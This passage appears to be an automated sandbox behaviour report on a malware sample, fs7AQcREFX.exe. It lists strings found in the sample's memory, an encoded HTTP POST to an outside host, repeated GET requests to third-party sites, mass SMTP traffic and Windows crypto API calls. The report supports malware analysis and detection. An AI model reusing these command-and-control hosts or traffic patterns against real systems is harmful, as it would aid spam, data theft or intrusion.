                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pwd.org/
                      Source: fs7AQcREFX.exe, 00000000.00000003.506622888.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.627354473.0000000007A90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.390671488.0000000005150000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.quadlock.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.quadlock.com/(
                      Source: fs7AQcREFX.exe, 00000000.00000003.566027260.00000000061C4000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.409112663.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.551326142.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajum.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stnic.co.uk/
                      Source: fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.transsib.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tvtools.fi/
                      Source: fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wifi4all.nl/
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wifi4all.nl/8
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.yoruksut.com.tr
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A
                      Source: fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.404216424.0000000003150000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.409783976.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 68 7a 63 76 4e 45 69 7a 65 70 53 63 37 4f 64 38 69 37 34 67 4c 4c 74 68 66 68 54 51 64 38 42 66 2f 48 4a 47 77 5a 6f 52 79 34 67 57 45 41 64 4a 59 32 49 68 48 54 74 4a 5a 48 2b 53 77 6e 4a 59 47 67 76 7a 76 75 49 70 46 44 7a 4a 36 69 32 6c 66 53 2f 42 6d 38 38 63 37 6a 4e 31 73 31 2f 72 52 64 52 79 48 36 4a 69 65 49 63 70 33 57 78 4c 34 34 31 67 44 42 4a 67 4e 47 36 46 58 70 56 59 6b 36 37 37 34 4e 58 54 46 51 55 36 6d 38 7a 53 79 6b 7a 70 37 37 38 51 2b 37 73 75 47 54 32 6a 4f 33 47 74 73 68 4c 72 42 75 6a 56 63 2b 54 31 33 4b 4c 30 76 63 5a 67 4d 64 79 70 4b 49 42 6e 6d 49 56 68 43 62 62 6b 42 5a 45 44 4a 7a 55 63 35 44 43 44 72 41 69 7a 39 67 6d 50 73 73 68 57 79 74 6f 47 76 56 32 48 35 4e 2b 59 2f 53 6c 54 69 69 47 36 6e 68 6b 4a 75 31 33 68 65 6e 33 67 65 75 4c 6b 56 53 36 65 4e 69 2b 6c 74 34 6c 4c 2b 6f 36 57 51 35 70 67 65 7a 6c 64 7a 65 74 52 53 6f 64 30 33 5a 2b 6f 74 70 43 79 68 2b 70 39 79 59 61 59 67 42 39 37 67 45 6d 43 50 2f 57 45 56 75 2b 78 54 51 4c 52 38 52 47 41 5a 72 35 6c 42 56 34 76 7a 65 37 42 71 51 2b 30 4f 44 59 58 32 4e 2f 59 64 6b 79 51 30 57 38 34 6e 67 64 2b 76 44 74 44 44 54 50 35 72 6f 49 2f 50 48 4b 59 75 6e 37 75 6e 71 4f 57 75 47 78 75 52 70 4f 47 46 69 39 53 36 71 72 75 55 7a 35 30 72 43 49 53 47 66 55 6e 77 6c 65 49 64 55 53 72 44 42 64 77 31 4d 71 49 37 59 44 6a 5a 61 35 39 55 57 34 63 7a 6b 55 57 38 6b 4b 4f 41 74 38 50 4b 4d 46 6f 66 42 59 55 70 72 33 45 5a 34 73 6c 4b 2f 33 70 4a 57 59 51 6b 79 4d 43 56 2f 4b 56 47 7a 36 59 58 4e 53 2f 2f 31 4d 73 4a 32 34 70 44 70 38 30 68 6a 4d 64 51 58 65 2b 6c 75 77 4c 52 62 35 4a 4c 42 30 30 57 56 76 61 74 39 38 33 58 43 57 54 Data Ascii: hzcvNEizepSc7Od8i74gLLthfhTQd8Bf/HJGwZoRy4gWEAdJY2IhHTtJZH+SwnJYGgvzvuIpFDzJ6i2lfS/Bm88c7jN1s1/rRdRyH6JieIcp3WxL441gDBJgNG6FXpVYk6774NXTFQU6m8zSykzp778Q+7suGT2jO3GtshLrBujVc+T13KL0vcZgMdypKIBnmIVhCbbkBZEDJzUc5DCDrAiz9gmPsshWytoGvV2H5N+Y/SlTiiG6nhkJu13hen3geuLkVS6eNi+lt4lL+o6WQ5pgezldzetRSod03Z+otpCyh+p9yYaYgB97gEmCP/WEVu+xTQLR8RGAZr5lBV4vze7BqQ+0ODYX2N/YdkyQ0W84ngd+vDtDDTP5roI/PHKYun7unqOWuGxuRpOGFi9S6qruUz50rCISGfUnwleIdUSrDBdw1MqI7YDjZa59UW4czkUW8kKOAt8PKMFofBYUpr3EZ4slK/3pJWYQkyMCV/KVGz6YXNS//1MsJ24pDp80hjMdQXe+luwLRb5JLB00WVvat983XCWT
                      Source: unknownDNS traffic detected: queries for: www.ftchat.com
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04001840 InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,wnsprintfA,HttpAddRequestHeadersA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,HttpQueryInfoA,VirtualAlloc,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_04001840
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:50236 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50408 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:50806 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:50855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:50924 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:51502 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.3:51737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.3:51779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:51781 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:51897 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.3:55357 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:58500 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:63360 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.3:63455 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:63521 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:64363 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:63758 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:64698 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:64737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.3:64911 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:64992 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:50491 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.3:50521 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:50520 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.3:50547 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:50561 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50581 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50587 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:50586 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:50932 version: TLS 1.2

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 42
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008800
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_04008970
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008A70
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0252A237 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_0252A237
